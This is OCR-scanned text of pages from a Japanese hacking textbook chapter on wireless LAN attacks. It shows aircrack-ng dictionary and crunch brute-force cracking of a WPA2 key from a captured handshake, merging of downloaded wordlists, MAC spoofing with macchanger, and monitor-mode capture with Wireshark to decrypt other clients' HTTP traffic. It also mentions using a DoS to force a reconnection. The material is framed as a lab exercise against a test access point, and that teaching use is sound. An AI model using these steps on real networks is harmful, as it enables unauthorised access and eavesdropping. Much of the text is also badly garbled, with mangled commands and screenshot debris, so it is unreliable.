 r = ャ ーー で ェ ーー 一 ーー* 
CB PO CP CD CB CB PD 5 CO5 CE 
が 、 者 - 生 . 等 s あぁ ポ 4 


テー ーー 
きこ 
by 


F 上 た : 
た ょ 
『: 
FA: 
『 衝 ・ 
F た : 
F ま 
『 用: 
| < を 
| ま 。 計 
に F た た : 
F ま 
F 生 : 
『F あ ・ 
FA: 
F 上 : 
ド ま 
F 有 : 
PA あ ・ 
F: 
F 族 : 
と 


6-84 WPAhandshake が 表示 され た 


5 辞書 式 攻撃 で WPA キー を 解析 する 

aircrackng で WPA キー を 辞書 式 攻撃 する た め に 、WPA キー の 辞書 ファ イル を 
用 意 し ます 。 こ こ で は 、 動作 確認 の た め に 、 次 の よう な "dic.txt' ファ イル を 生成 し 
ます 





564 | 第 2 部 | ハッ キン グ を 体験 する 


Poo 仁 個 kal1:< 昔 cat > dc. て tx 
teS 寺 上 上 eS も 

hogehoge 

1234567899123 

asdfasdfasd† 

aabbccddee†† 


^C 一 較 (cda 和 EE3ESk 17 の た 


4-way handshake の 認証 デー タ か ら PTK が 得 ら れ ま す 。 一 方 、 候補 と な る WPA 
キー か ら 、ESSID、4-way handshake の ノン ス 、 MAC ア ドレ ス と いっ た 情報 を 
陣 っ て 、PTK を 生成 し ます 。 よ っ て 、 前 者 の PTK と 後者 の PTK が 一 致す れ ば 、 そ 
れ が ター ゲッ ト AP が 保持 し て いる WPA キー と kde し 由 す 


aircrackng で 辞書 式 攻撃 する に は 、 次 の よう に 入力 し : 


POott 細 ka11:<# a1rcrack-ng handshake-91 .cap -w dic.txt -e LAB3 


"No valid WPA handshakes found. と 出力 され れ ば 、 攻 撃 に 使う デー タ が 信 っ 


て いな い の で 失敗 で す 。 もう一度 攻 撃 し て くだ さい 。-e オ プシ ョ ン で ESSID を 指 


て 一 


定 し まし た が 、 省 略 で きま す 
解析 に 成功 する と "KEY FOUND!'" と いう メッ セー ジ と 共に 、WPA キー が 表示 
され ます ( 図 6-85) 


File EK View Segch Terminal Hep 


EAPUL 計 情 に 


ーー 
一 





6-85 辞書 式 攻撃 で WPA キー の 解析 に 成功 し た 
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6 イン ター ネッ ト で 公開 され て いる 辞書 ファ イル を 利用 する 

解析 に 成功 し まし た が 、 こ れ は WPA キー を 含め た "dic.txt ファ イル を 用 いた 
た めで す 。 一 般 に 無線 LAN の WPA キー を 解析 する に は 、 優 秀 な 辞書 ファ イル が 
必要 に な り ま す 。 こ こ で は 、 イ ンタ ーネット で 公開 され て いる WPA キー の 辞書 
ファ イル を 用 いて み ま す C*78)。 


root 過 a11:<# git clone https://github.com/Kennyn519/wpa2-wordlists.git 
roota11:<# Cd wpa2-wordlists/Mord]11ists 

rootMa11 :>/wpa2-word1ists/Mord1ists# 1S 

Bigone2916 Tnsider2916 Neo2916 Ransom2916 Ultimate2916 
Crackdown2916 Ma]or2916 Potentia12916 Rockyou 

roota11 :>/wpa2 -word1ists/Mord1ists# cd Crackdown2916/ 

roota11 :>/wpa2 -word1ists/Mord1ists/Crackdown2916# 1S 

A.txt.gz E.txt.gz TI.txt.gz M.txt.gz 0.txt.gz U.txt.gz Y.txt.gz 
B.txt.gz F.txt.gz ]〕.txt.gz N.txt.gz R.txt.gz V.txt.gz Z.txt.gz 
C.txt.gz G.txt.gz K.txt.gz 0.txt.gz S.txt.gz M.txt.gz 

D.txt.gz H.txt.gz L.txt.gz P.txt.gz T.txt.gz X.txt.gz 

root 過 a11 :</wpa2-word]1ists/Mord1ists/Crackdown2916# gunZiD *.gzZ 
root 過 a11:</wpa2 -word]ists/Mord1ists/Crackdown2916# 1S 


KDE) DPDCE 6iEXE JLDCEK 月 DCE Pi も CE SEKE MEKE VSE 

Bi も Et EEKE Hi も CE K。 も CE NECE 0: も CC TBDcE Mi も tt Z: も も 

に 2 も rt も kE TPKE 上 E。. も BCE 0. も CE Ri も ktE Ui も BE CC 

rootMa11 :>/wpa2 -word1ists/Mord]ists/Crackdown2916# cat *.txt >> ful] .txt 
roota11 :</wpa2 -word1ists/Mord1ists/Crackdown2916# wc ful].txt -1 
58417399 

root 全 a11 :>/wpa2 -word1ists/Mord1ists/Crackdown2916# 1S -]1h ful1.txt 

-Tw-P--『-- 1 root root 634M Aug 8 23:31 fu11.txt 


この ファ イル で 辞書 式 攻撃 する に は 、 次 の よう に 入力 し ます 。 


78 : https//github.com/kennyn510/wpa2-wordlists 
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roo て 個 kal1 :- a1Pcrack-ng handshake-91.cap -w /Proot/wpa2 - 
wordl1sts/Mordl1sts/Crackdown2916/ 和 ul .t 上 xt -e LAB3 


解析 に 成功 する と 図 686 の よう に な り ま す 
プア ー ツ た だ 5 た 、 マッ - 
ム ) に は ポリ D 時 間 カ * か る よさ 


ーー に 。 マ ンー デー ニキ モス 
導 ck iM レ 】 
か る よう で し た が 、 交 13 


3 分 で WPA キー の 解析 1 


- 成 功 し まし 





N ユ 






すべ て の 候補 パス ワー ド 
に の と を た くり) に 


U EZ 上 ム /7 は 3 ア / 3D 
ZD ヒ 上 F Z68 し C 4 は 8 FA 
92 AE BB 69 9』/ 


テハ 


に EAPOL HH 


図 6G8C ダウ ン ロ ー ド し た 辞書 ファ イル で 解析 に 成功 し た 


7, 総 当たり 攻撃 で 解析 する 
いく つか の 辞書 ※ イ ル を 試し て も うま くい か な けれ ば 、 総 当たり 攻撃 を 試み 
イル を 作る こと で 


で 、 疑 似 的 に 総 当 た 


ます 。crunch で 総 当 た 


# だ り 用 の 辞書 ファ 
を 実現 で きま す 。 


ーー 市 い り 攻撃 

し か し ぁ な が ら 、 畔 書 フ ・ ィ イル の 容量 が 膨大 に な る こ と を 孝 應 し な けれ ば な リ ま 

例え ば 、 最大 8 桁 の 場合 、 候 補 文 字 が 数 字 の み で あっ て も 、941M バ イト も 
使い ます ( 表 6-15) 。 
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表 6-15 辞書 ファ イル の 容量 の 変化 


numeric (数 字 の み ) 941M バ イト 





lalpha (英字 の 小文字 の み ) 1.812G バ イト 
mixalpha (英字 の 大 文字 ・ 小 文字 ) 445T バ イト 


英字 まで 含め る と 組み 合わ せ が 膨 大 に な り 、 辞 書 フ ァイル の 容量 が 大 きく な り 
すぎ ます 。 例え ば 、 最 大 8 桁 か つ 候 補 文 字 が 数 字 の み の 辞 書 フ ァイル を 作成 し て 辞 
書式 攻撃 する に は 、 次 の よう に し ます 。 


root 人 a1i:<# crunch 1 8 -f /usr/share/crunch/charset.1st numeric > brute_dic.txt 
root 飼 a1i:<# aircrack-ng handshake-91.cap -w brute_dic.txt -e LAB3 


消 MAC ア ドレ ス の 人 徐 装 

MAC ア ドレ ス は 通常 LAN ア ダ プ ター 固有 の も の と され て いま す が 、 実 除 に は 
様々 な 偽装 方 法 が あり ます 。Kali に は 、MAC ア ドレ ス を 偽装 で きる MacChanger 
が イン スト ー ル され て いま す ("79)。 

MacChanger を 用 いた MAC ア ドレ ス の 偽装 方 法 は 、 次 の 通り で す 。 こ こ で は 、 
無線 LAN ア ダ プ ター の イン ター フェ ー ス wlan0 を 指定 し ます が 、 有 線 LAN ア ダ 
プター の イン ター フェ ー ス も 指定 で きま す 。 


1)MAC アド レス を 確認 する 
ifconfig コマ ンド で MAC ア ドレ ス を 確認 し て お きま す 。 


Poot 仙 Ka11 :<# 1 和 Tconf1g wlan の 9 
wlan9: †lags=893<UP , BROADCAST , NOTRAITLERS , PROMISC,ALLMULTT> mtu 1599 
unspec 99-C9-CA-97-6B-82-99-99-99-99-99-99-99-99-99-99 .」 
txqueuelen 1999 (UNSPEC) 
RX packets 2935282 bytes 314745192 (399.1 MiB) 


79 : https//github.com/alobbs/macchanger 
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"00-CO-CA-97-6B-82-00-00-00-00-00-00-00-00-00-00' と いう 文字 列 が あり ます 。 こ の 
うち 前 半 6 プ ロッ ク が MAC ア ドレ ス に な り ま す 。00-CO-CA-97-6B-82 を |:」 区 切り 
に する と 00COCA:97:6B:82 に な り ま す 。 


② イ ンタ ー フ ェ ー ス を 無効 に する 
イン ター フェ ー ス を 無効 に し ます 。 





3⑬MacChanger で 現状 の MAC アド レス を 確認 する 
MacChanger で -s オ プシ ョ ン を 用 いる と 、 現 状 の MAC ア ドレ ス を 確認 で きま 
す 。 





"ALFA. INC. と いう 部 分 は 、MAC ア ドレ ス の ベン ダーID か ら 識 別 し た 会 社名 
で す 。 


(④ ベ ンタ ダーID を 変化 させ す に MAC アド レス を 変化 させ る 
ベン ダーID を 変化 きせ ず に 、 MAC ア ドレ ス を ラン ダム に 変化 させ る に は 、 で オ 
プシ ヨン を 用 いま す 。 





| 第 6 章 | LAN の ハッ キン グ 569 


直前 の MAC ア ドレ ス 。 | 


本 来 の MAC アド レス 。 | 
三 聞 し い MAC ア ドレ ス 





エラ ー メ ッ セ ー ジ が 表示 され ず 、"New MAC" の 項目 が あれ ば 成功 し て いま す 
(*80)。 前 半 3 プ ロッ ク (OO:cOrca) が 変化 し て いな いこ と が わか り ま す 。 


⑤ MAC アド レス 全体 を 変化 させ る 
MAC ア ドレ ス 全 体 を ラン ダム に 変化 さき せる に は 、-r オ プシ ョ ン を 用 いま す 。 





識別 で き な い ベン ダーID に な っ た た め 、"unknown" と 表示 され て いま す 。 実行 
を 繰り 返す と 、 次 々 と ラン ダム に 変化 し ます 。 


⑥ 指 定 し た MAC アド レス に 変化 させ る 
明示 的 に MAC ア ドレ ス を 指定 する 場合 に は 、-mac オ プシ ョ ン を 用 いま す 。 指 
定 す る MAC ア ドレ ス は 「:」 区 切り で す 。 


*80: イ ンタ ー フ ェ ー ス を 有効 に し た まま だ と 、"ERRORI] Could not change MAC: interface up or 
insufficient permissions: Cannot assign requested address" と いう エラ ー メ ッ セ ー ジ が 表示 され 
ます 。 
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⑦ 本 来 の MAC アド レス に 戻す 
LAN ア ダ プ ター に 割り 当て られ て いる 、 本 来 の MAC ア ドレ ス に 戻す に は 、-p 
オプ ショ ン を 用 いま す 。 





(⑧) イ ンタ ー フ ェ ー ス を 有効 に する 
MAC ア ドレ ス の 変更 後に 、 そ の イン ター フェ ー ス を 用 いる 場合 に は 、ifconfig 
コマ ンド で イン ター フェ ー ス を 有効 に し ます 。 





な お 、 シ ステ ム に よっ て は 、 無線 LAN ア ダ プ ター の MAC ア ドレ ス が 一 定 間隔 
で 変化 する こと が あり ます 。 こ れ は 、 ラ ンダ ム MAC ア ドレ ス 機 能 に よる も の で 
す 。MacChanger で MAC ア ドレ ス を 変更 し て も 、 こ の 機能 に より し ば らく する と 
別 の アド レス に 変わ っ て し まい ます 。 こ れ を 回 避 す る た め に は 、 ラ ンダ ム MAC ア 
ドレ ス 機 能 を 無効 に し ます 。 
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泡 Kali で の 無線 LAN の パケ ッ ト キ ャ プチ ャ 
代 Managed モー ド 


①Managed モー ド に 切り 替え る 

Wireshark を 起動 し ます 。 メ ニュ ー の 「Capture」 > 「Options」 を 選ぶ と 、 
| Capture Interface」 画面 が 表示 され ます 。 wlan0 に 注目 し ます 。 Monitor モー ド に 
切り 替え られ る 無線 LAN カ ー ド で あれ ば 、| Monitor Mode」 に チェ ッ ク で きま す 。 
この チェ ッ ク が 入っ て いる と 、|Link-layer Header」 は |802.11 plus radiotap 
header」 に な っ て いま す 。 こ こ で は Managed モ ー ド で キャ プチ ャ する の で 、 
チェ ッ ク を 外し ます 。 す る と 、|Link-layer Header」 は Ethernet に 切り 替わり ます 
( 図 6-87)。 





















「 Wireshark - Capture Interfaces 【x】 
ーー ロコ ヨミ yp の モジ と ルル 4 
ItetTaCe TralTiec Lin-Iawei Header Prommscu Snaple (は) BuWfer (MEB) orwtor Moce Capture Fte^ 
* ethO 上 嘱 路 、 川 敗 Exhermst ア defsJlt 2 
* hl ル Ethernet 4 Oefaslt 42 
anY y default 2 
* Loopbasxic Io LV_、、5、5 ぞ 5 ぞ 55sagsas マ default 2 
WUsrU 5 ア defasJli 
rtoc y defaalt 2 
JeU で sl ァ defsult 4 
bmonl ee y 4 
Ebemon2 RC y 2 
cco em0ote CPKure て IscodumDp 人 ee, を e 
Randcrm paCket qemerator: randpkt DLT - ュ 
SSH reemote caDWUre- < の dummp DLT -} 
N 
7 『 
y Enable QtIsCuOus nmOde Oi al Interfaes トーーーーーー ーー - 表示 リュ リ リ 
ま ま 
Cafture flter for sele<ted terfeces: | 目 Enter acaPture「ilter 回 回 リ ます 。 
の Help 
Wireshark - Capt 電 で Interfaces @ 
Input Output Optoms 
IntetfaCe TraWfic Lint-Iayer He 凍 je PromisCu Smaplen (B) Buffer [MEB) 憎 omitor Mode Capture Fite~ 
* EhO し し JJ し リリ リリ リ レ し リ し Exhernet マッ defsuit 2 
+ eth1 et ア defaut 2 
anY リー。。 Unux cooke ア dcfsut 2 
* Loopk lo 』 A 』 凍土 圧 還 | ! し ーーー 2 
ro 2 
WUJCU で 2 
tbmonl DLT ・1 2 
5bmon。 es 2 
Cieco fefmOt9 て atUrW: SCOGMTD Saidseesesesssesssssssi1 二 本 
Randcm packet generaLor ramdDkt ee | 
SSH remote capture- 6eShdurmp ease い 
W 1 日 6 | | 
ly Enabile PromW6cou6 mode Cm 利 L IMWTTaC04 Manade Intwrfa<eS .. 
Capture flter for selectedinterfaces: | 放 Enter a captre flter | Comlle BPfs 
@Help wClose | ン Sut | 


図 6.87 「Capture Interface」 画面 で モー ド を 切り 替え る 
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② キャ プチ ャ を 開始 する 

ここ で は 、wlan0 を 選び 、[Start] ボタ ン を 押し ます 。 す る と 、 キ ャ プチ ャ が 開 
始 さ れ ま す 。 後 は 、 Windows に て Managed モー ド で キャ プチ ャ し た と き と 同 様 に 
探 作 で きま す 。 


人 で Monitor モー ド 

無線 LAN の パケ ッ ト キ ャ プチ ャ の ボイン ト は 、 無線 LAN ネ ットワーク に 接続 
する 必要 が な いこ と で す 。 つ まり 、 接続 パス ワー ド を 解読 する 必要 も あり ませ ん 。 
実験 用 の AP を 用 意 し て 、 次 の よう に 設定 し ます 。 





昌 | "aabbccddeeff" 


少な く と も 1 吾 の 端末 (実験 で は スマ ホ を 使っ た ) を 、 こ の ネッ トワ ー ク に 接続 
し た 状態 に し て お きま す 。 


①) 周 辺 の 無線 LAN 状 況 を 確認 する 

Monitor モー ド に し ます 。 

次 に 、airodump-ng で 周辺 の 無線 LAN 状 況 を 確認 し ます 。 様々 な チャ ネル で 飛 
ん で いる ESSID が 列挙 され ます 。 こ こ で は ター ゲッ ト AP が 決ま っ て いま す 。 


# airodumD-ng 

( 略 ) 

BSSID PMR Beacons  #Data,#/S CH MB ENC CIPHER AUTH ESSID 
99:91:8E:B9:8D:98 -47 2 1 9 6 65 MPA2CCMP PSK LAB3 
( 略 ) 


この AP の 暗号 化 方 式 は WPA2-PSK、 チ ャ ネル (CH) は 6、SSID は "LAB3" と 
わか り ま し た 。 ま た 、 何 ら か の 方 法 で パス ワー ド ("aabbccddeeff') を 特定 済み と 
し ます 。 
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2② Wireshark を 起動 する 
Wireshark を 起動 し ます 。 ま だ キャ プチ ャ は 開始 し ませ ん 。 





3 Wireshark に 鍵 を 登録 する 

メニ ュー の 「View」 > 「Wireless Toolbar」 を 選び 、 無線 LAN の ツー ル バ ー を 
表示 し ます 。 

表示 され た 無線 LAN の ツー ル バ ー に ある 、[802.11 Preferences] ボタ ン を 押し 
ます ("81)。 す る と 、「IEEE 802.11b wireless LAN」 設定 画面 が 表示 され ます 。 次 
の よう に 設定 し ます 。 


* | Enable decrypton] に チェ ッ ク を 入れ る 。 
*・ | Decryption Keys」 の 右側 の [Edit] ボタ ン を 押す 。 


する と 、 鍵 の 登録 画面 が 表示 され 、[+] ボタ ン を 押し て 鍵 と SSID を 登録 で き 
ます ( 表 6-16) ("82)。 


表 6-16 「Key type] と 「Key] 


ytype | | wep、wpa-pwd、wpa-DSsk か ら 選 ぶ 。 

| |・64 ビ ッ ト 版 で は 、16 進 文字 列 (10 桁 ) を 2 桁 で 上 「:」 区 切り 
例 : a1:b2:c3:d4:e5 
・128 ビ ッ ト 版 で は 、 区 切り な し で 16 進 文字 列 (26 桁 ) 


| 例 : 0102030405060708090a0b0c0d 
「 く パス ワー ド >:<SSID>」 と いう 書式 で 入力 する 。 


ーー |wpapsk 事前 共有 キー (pre-shared key : PSK) を 入力 する 。 





ここ で は [Key type」 に |wpa-pwd」 を 選び 、|Key」 に aabbccddeefELAB3 


81: メ ニュ ー の 「Edit」 > 「Preferences」 を 選び 、 友 ペイ ン か ら [Protocols」 > [IEEE 802.11 」 
で も 表示 で きま す 。 


*82 : https//wikiwireshark.org/HowToDecrypt802.11 
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を 入力 し ます ( 図 688) C83)。 













Wireshnrk Prefererces 





・ ” 還 EE 802.11 wiwwiews LAN 
WSLP マ Reasiwmbie awmefreed 802 11 (tagrame 
ーー herevendor<PeciiriHT ganwgts チェ ッ ク を 入れ る と 登録 
SI y Call subdissector for retransmtted 802.11 Frames し た 情報 で 復号 し ます 。 
ISMS Assume pecigtts havw FCS 
RSRP マ Validate the FCS checiksum pacS め le 
上 More te Protetion bs 
MAPP < Ne 
^ 箇 Yes - whout V 
Yes ・wKh 
WPA Ker MIC Length eee 0 *| に | へ | て | 還 Zoot/confsotwweshafv80271 keis 





[+] ボタ ン か ら 、 鍵 と 
SSID を 登録 し ます 。 


図 6-88 デー タ を 復号 する た め の 設 定 


(④ キャプ チャ の モー ド を 設定 する 

メニ ュー の 「Capture」 > 「Options」 を 選択 し て 、 オ プシ ョ ン 画 面 を 表示 し ま 
す 。wlan0 を 選択 し て 、「Promiscuous] (プロ ミス キャ スモ ー ド ) と 「Monitor 
Mode」 に チェ ッ ク を 入れ ます ( 図 689) ("84)。 


83 : パス ワー ド と SSID が あれ ば 、 次 の URL に て 事前 共有 キー を 生成 で きま す 。Passphrase 欄 で 
"aabbccddeeff'、SSID 欄 で "LAB3" を 押し て 、[Generate PSK] ボタ ン を 押す と 、PSK 欄 に 文字 
列 が 生成 され ます 。 [Key type」 に |wpa-psk」、「Key」 に この 文字 列 "cd3d31c3e6cfSc9223fbf78 
ba6b70ab639a1c94f25fce8a5ba752ca08cc92557" を 設定 し て も 復号 で きま す 。 
https//www_.wireshark_.org/tools/wpa-psk.html 


*84 : [Monitor Mode」 に チェ ッ ク で き な い 場合 に は 、 無 線 LAN ア ダ プ ター ある い は は ドライバー が 
Monitor モ ー ド に 対応 し て いま せん 。 ま た 、|「Monitor Mode] に チェ ッ ク を 入れ て も 解除 きれ て 
し まう 場合 に は 、 wlan0 が Managed モー ド に な っ て いる 可能 性 が あり ます 。 コ マン ド か ら 明 示 的 
に Monitor モ ー ド に 変更 し ます 。 





| 第 6 章 | LAN の ハッ キン グ 575 


由 w Ed wew Go CaPiwe eaMaie Slimslcs Twinw Pewiwss Tosh hw 


lei HUUL (人 ( ず て 


IE 3 
* wii 
* ei 
Lu / 
* LCeG が WI 


\ 
| 
『 
> 
・ 


Sen (回 Bufls (h 特 Minimini Ptcxde Cs を sw “ 
wt 
1 
ws 
wi 

0 け ナ 1 1 | 届 A 「 ae) header 
nfad UN nrfNtT In TKOPt 
お に Nw vi 
MTmetii ULT -』 
U だ fd DLT -! 
いり 6 TOWTONN (Em OTTOCMT ま nf (hm Or を 昌 「 
Kimimljgw iet merCr mnipmt Cet 洋 of Oc Perwie rk | 寺 』 
me car も me dePeriert DLT 


くく くく そく くく |』 


< ユン nm 上 e < まま ャ - ま 』 
* MOOD Header kh aaa 『 
03 . 11 raulo im 6 


・ IEEE 09 .11 cae wabir mcscupouE mdc on 旋 CTSc で 3 MaOE IIWeHfarcs - 
Type/suhbtypei - 


* FN COMKTM 旧 Wi 人 lm 「ef Trttei mWimtatm Yet で 4 か arr に に Come m+ 
we むせ は CD は dy 
em キオ ュ = ほ 1 
elp 

0 日 3 は 8 
8 は # on 33 4 12 る BB で 6 33 で る 
。c @9 99 99 64 99 31 94 99 07 202 35 3 生 29 69 3 
》)4 30 は も も 0! 0》 オ d お 2 Ni 0 4 す 6 Nb 0 906 aa。 2 
1》 4 用 う 4 82 H1 96 09 0 *1 BO 9D 87 GW Aa 50 ま 『「 
の W ね 1 Bd 34 2n ひ 1 DD 3 3 3W 438 《65 65C 39 3a ef マ と 
13 3b 『f ff HON EE 5 48 m「 6 ほ IN 0 (0 地 6 0 90 


町 We 101- Tag mi fwan La im PcNets わ 3- Pted 4323 ICO OO ー 
は W ザ る ニーW ダ は の 9 の 





uetoothbAuN 4878B0GB 3SGB 


251MB 21GS 





図 6.89 「Monitor Mode] に チェ ッ ク す る 
と ころ で 、 プ ロミ スキ ャ スモ ー ド と は 、 無 条件 に すべ て の パケ ッ ト を 取り 込む 
モー ド で す 。 有線 LAN の 場合 、 プ ロミ スキ ャ スモ ー ド に する と 、LAN ア ダ プ タ 
に 届い た すべ て の パケ ッ ト を キャ プチ ャ で きま す 。 ik AN の 場合 も 原理 と し - 
は 、 同様 に 無線 L AN アダ プター に 届い た すべ て の パケ ッ ト を キャ プ ナ re ま 
す 。 つ まり 、 同 じ SSID の AP に 接続 し た 端 pe すべ て の パケ ッ ト を 受信 で きま す 。 
し か し な が ら 、 実際 に は 自分 宛 の パケ か 受信 で き な い こと が 多く 、 
Wireshark も これ に 該当 し ます 。 よっ て 、 に ma ッ ト も キャ プチ ャ し た 
い 場 合 に は 、Monitor モ ー ド に し な けれ ば な り ま せん 。 
ここ で は | Promiscuous」 に も チェ ッ ク を 人 れ ま し た が 、 プ ロミ スキ ャ スモ ー ド 
が 有効 だ と キャ プチ ャ が うま くい か な いこ と が た ま に あ り ます 。 も し うま く キ ャ 
プチ ャ が で き な い と き は 、|Promiscuous] の チェ ッ ク を 外し ます 。 


ォ 


5: キ ャ フチ ャ する チャ ネル を 指定 する 
キャ プチ ャ する チャ ネル を 指定 し ます 。 そ こ で 、 別 Terminal を 開い て 、 次 の コ 
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マン ド を 実行 し ます CC85)。 


root 細 ka11:<# 1wconfT1g wlan9 channel 11 


この よう に 、 無線 LAN の パケ ッ ト キ ャ プチ ャ で は 、1 つ の チャ ネル し が か が 監視 で 
きま せん 。 も し すべ て の チャ ネル を 同時 に 監視 し た けれ ば 、 す べ て の チャ ネル を 
カバ ー す る だ け の PC (ある い は 無線 LAN ア ダ プ ター) を 用 意 す る こと に な り ま 
す 。 例 えば 、2.4GHz 帯 で あれ ば 13 チ ャ ネル 、52GHz 体 で あれ ば 19 チ ャ ネル も あ 
り 、 あ まり 現実 的 で は あり ませ ん 。 

な お 、Wireshark の 無線 LAN の ツー ル バ ー の 中 央 に 、Channel の プル ダウ ン メ ヌメ 
ニュ ー が あり ます 。 ここ を 切り 替え て も 監視 する チャ ネル を 変更 で きま す (切り 
替え る だ け で あり 、 同 時 に キャ プチ ャ は で き な い ) ( 図 6-90)。 


Pe Eak Wew 5o Capum Amawie Sihspcs Tespnomr Wemeess TnoE Pe ' チャ ネル を 切り 替え る と 、Channel 列 


4 画 加 @ 6 ロ 区 9AeeOoew 還 国人 AS& 吾 も 変化 し 、 指 定 し た チャ ネル の パケ ッ ト 
AP ・9spbY 6Hher - < で wt を キャ プチ ャ で きた こと が わか り ま す 。 
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10837 33 .290933 104 Tp-LinkT_e1:fdiOF (- 

1083# 33 . 20934295 tmtmlCor_ 1:f9:a9 (。 Tp-LinkT_c1:fd:Bf (。 0 。31 


* Frane 20.42: 5B bytes Cm MirE Ro bits]。 5B bytes Captared (436 bits] on interface B 
Lemweth 3 


peasdor v9, 
・ 002.11 FIO jnrermNtlne 
PHY tyP で : BB2.13 ロ 16) 
Ort PP で awb』E- False 
PrfOhf1WtNTy WNW: MO (| 
atm FQK で : 24。 全 MD/s 
Channel: 31 
FEfWUWTNY | 2 
$1OiiB1 sfT6( 條 (ON) | -10GWW 
TSF timestnmD: 354T3Z07H314 


NN BOOM13 委 3310 ニニ rataoW: 133 CTnARG 
IINN OB 0 24 00 <『 30 DO 9O ZD 00 WO の 0 90 
Il 用 2 603 bf IO 24 00 5 060 1 ゆ 0 90 00 で 
8039 9 667o866c4G9ec 69 5D c7 bf e1 fd 
BB や d5 ce4 





図 6.90 Channel の 切り 替え 


*85 : 無線 LAN の ツー ル バ ー の 中 央 で チャ ネル を 変更 し て か ら 、[|Start capturing packets| アイ 
コン を 押せ ば 、iwconfig コ マン ド で チャ ネル を 変更 する 必要 は あり ませ ん 。 
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6⑥)HTTP 通信 の デー タ を 復号 する 

オプ ショ ン 画 面 で [OK] ボタ ン を 押す と 、 キ ャ プチ ャ が 開始 され ます ("86)。 
大 量 の パケ ッ ト が 流れ ます 。1 秒 間 に 10 回 の 頻度 で ビー コン と いう パケ ッ ト が 飛 
び 交 っ て いる こと を 確認 で きま す 。 こ れ は AP が ビー コン を 発し て いる だ た めで す 。 

端末 で イン ター ネッ ト に アク セス する と 、 そ れ ら の パケ ッ ト も 記録 され ます 。 
し か し 、Protocol は 802.11 ば か り で す 。 これ は HTTP パ ケッ ト が 暗号 化 さ れ て し 
まっ て いる だ た めで す 。 デ ー タ 部 を 見 て も 内 容 を 識別 で きま せん 。「 す で に 鍵 を 登録 
し た は ず な の に 、 な ぜ 復 号 さ れ て いな い の か 」 と いう 問 を 持つ か も し れ ま せん 。 
この 答え は 、 WPA-PSK や WPA2-PSK の 暗号 通信 は 、 WPA キー 以外 の 情報 も 用 い 
て お り 、 そ の 一 部 に 乱数 が 含ま れ て いる た めで す 。 

4-way handshake に つい て 復習 し て か ら 、Wireshark で パケ ッ ト が 復号 で き な 
か っ た 理由 に つい て 考え て み ま す 。 Wireshark の 設定 画面 に WPA キー を 設定 し て 
いる の で 、Wireshark に と っ て 既知 で す 。 ま た 、 MAC ア ドレ ス や ESSTID は 暗号 化 
され て いな い 部 分 に ある の で 、 既知 で す 。 し か し 、 ノ ンス は 未知 で す 。 そ の た め 、 
PTK が 未知 で あり 、 復 号 で き な い わけ で す 。 逆 に いえ ば 、 ノ ンス を 得 ら れれ ば 復 
号 で きる と いえ ます 。 よっ て 、4-way handshake の 通信 を キャ プチ ャ で きれ ば よい 
こと に な り ま す 。 し か し 、 こ れ は 端末 が AP に 接続 する 最初 の 通信 だ け で 行わ れ ま 
す 。 

ここ で は 、 い っ た ん 無線 LAN か ら 切 断 し て 、 接 続 し 直し て み ま す 。 あ くま で 実 
験 な の で 、 ス マ ホ の WiFi を いっ た ん 切っ て か ら 、 再度 つなぎ 直し まし た 。 そ し て 、 
イン ター ネッ ト を 巡回 し ます 。 す る と 、Wireshark の 画面 で HTTP な どの 通信 が 
見 える よう に な り ま し た (過去 の 通信 も 含め て ) ( 図 6-91)。 


"86 : ここ で は Wireshark か ら キ ャ プチ ャ を 開始 し まし た 。 す で に キャ プチ ャ ファ イル が あれ ば 、 
それ を 読み 込む だ け で す 。 airodump-ng は 、aircrackng パ ッ ケ ー ジ の 一 部 の プロ グラ ム で あり 、 
無線 LAN カー ド が 対応 し て いる プロ トコ ル や チャ ネル の 全 パ ケッ ト を キャ プチ ャ し ます 。 次 の 
よう に airodump-ng を 実行 すれ ば 、Wireshark が 読み 込め る キャ プチ ャ ファ イル を 生成 で きま 
す 。 


root@kali:<# airodumWp-ng --Channel 6 --bssid 99:91:8E:B9:8D:98 --write out wlan6@ 
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IWefge wm ・ Channel 5 2437 ェ < 20 を ・ 8S02.11 Prmfemenrws 

Time _ Sokgce Destnston Preeocol ー 
1 5038 72.341073206 192.168.1.15 110 232 .153 .177 NTTP 
| BB46 72.39721G4B3 336.232.1953.177 49? . 168 .1.45 HTTP 
D425 72.3856399131 336.232 .103.177 192 . 168 .1 .45 HTTP 
343 了 2.$ ち 348QS60 392.136 ま .3.35 13@.232 .153 .377 HTTP 
1 5434 あゆ 了 3.#%6021550 302 30 13 13 ゅ 3 1 ば .377 HITP 
534 ナ 了 2 . き 70693382 392.36 ま .3.15 13@.233 .153 .377 NTTP 
きき 9 72 。 を BDD99434 492。368 、3 3 る 13⑳.232 .153 .377 HTTP 
653 を 6 72 .$ の 94595933 336.29#. 3 お 3 . 177 39 は 360 .1 3 も TE 
WE 





1 3 み = 
* FFPaIG 5007。 3D bytG5 ON WAF で (49ew bl1ts)。 DO byUms で aDtmred 949 bstsj Gt tar eo っ 


* RAIWLAD INader ye, つや 
* BB2.33 radiO nforfhst 


・ TEEE 692.31 QOS Date JR os デー タ が 復号 され た こと 
PTeCWo6 We 192 .16$.1.15。 Dsti 110.232.153.177 が わか り ま す 。 


Log 
* IntermiWt PeCBoe Ver$ie 4。 SC: 
0。 36q: 65。 ACEk: 2000. Len: 6⑥6 


* TFPan3mi3533om Contro」 Pretoco1。 SrC Port: 35490。 Dst PoTt: 
キ 








IN wi AN り US 0D O0 0 OO OO 49 0 OCZ OO w1 「 す 4 0 1 り 
Ni1U 4D ゆ 90 Ob 09 < ad ゅ 1 0f 6 *D 9 ゆ 9 0D1 SN 9% 0D 5W ・・ 。 簡 ・-・・-- 参 
2N 的 906 af 67 bf an 685 「9 80 1 1 3cC <】 6] $bD 08 ・ー・ 衝 ・・・ <M 
| 93 91 9 0W OU 13C 3 40 0 《 0f 47 45 34 2 上 」 1 
AI 327 7 65 7 ゅ 27 70 63 2f 1 DD 

コ ネネ 3 マ L き 








oe - つ 号 で きる パケ ッ ト を 選ぶ と 、 復号 内 容 
ー ーー ー 
ーーー を 表示 で きる タブ が 表示 され ます 。 関 3 で 


図 6-91 復号 され HTTP 通 信 が 見 える 





実際 の ハッ キン グ の 場面 で や われ ば 、 ター ゲッ ト 端 末 を DoS ア タッ ク ("87) で ネッ 
トワ ー ク か ら 強 制 的 に 切断 させ ます 。 タ ー ゲ ッ ト 端 末 に お いて ネッ トワ ー ク プロ 
ファ イル に 自動 接続 で 設定 し て あれ ば 、 そ の 後 す ぐに 4way handshake が 行わ れ 
ます 。 結果 と し て 、 攻 撃 者 の 画面 に は 復号 され た 結果 が 表示 され ます 。 


⑦) キ ャ プチ ャ し た 内 容 を 確認 する 
